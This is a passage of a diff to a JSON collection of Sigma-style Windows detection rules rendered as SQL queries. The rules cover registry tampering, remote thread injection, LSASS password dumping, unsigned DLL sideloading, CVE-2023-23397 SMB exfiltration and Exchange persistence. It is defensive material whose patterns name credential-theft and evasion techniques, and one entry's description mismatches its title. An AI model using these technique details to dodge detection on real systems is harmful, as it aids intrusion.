SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is 
modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", + "status": "experimental", + "description": "Offensive tradecraft is switching away 
from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "status": "test", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during 
installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject 
LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", + "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "status": "test", + "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.t1006" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." 
+ "Legitimate Administrator using tool for raw access or ongoing forensic investigation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName IN ('System', 'Registry')) OR (NewProcessName LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR 
(NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\')))" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a DNS server error 
in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "title": "Unsigned 
Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_hide_file.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer 
program", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.credential_access", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Standard domain users who are part of the administrator group. These users shouldn't have these right. 
But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + ], + "filename": "win_lsa_server_normal_user_admin.yml" + }, + { + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "status": "experimental", + "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "COM Hijack via Sdclt", - "id": 
"07743f65-7ec9-404a-a519-913db7118a8d", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Unknown" + "Account fallback reasons (after failed login with specific account)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "New Application in AppCompat", - "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "status": "test", - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", + "status": "experimental", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. 
This could be a sign of potential exploitation attempts of CVE-2023-23397.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_new_application_appcompat.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, 
{ - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "author": "frack113", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1505.002" ], "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + 
"title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.t1133" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE 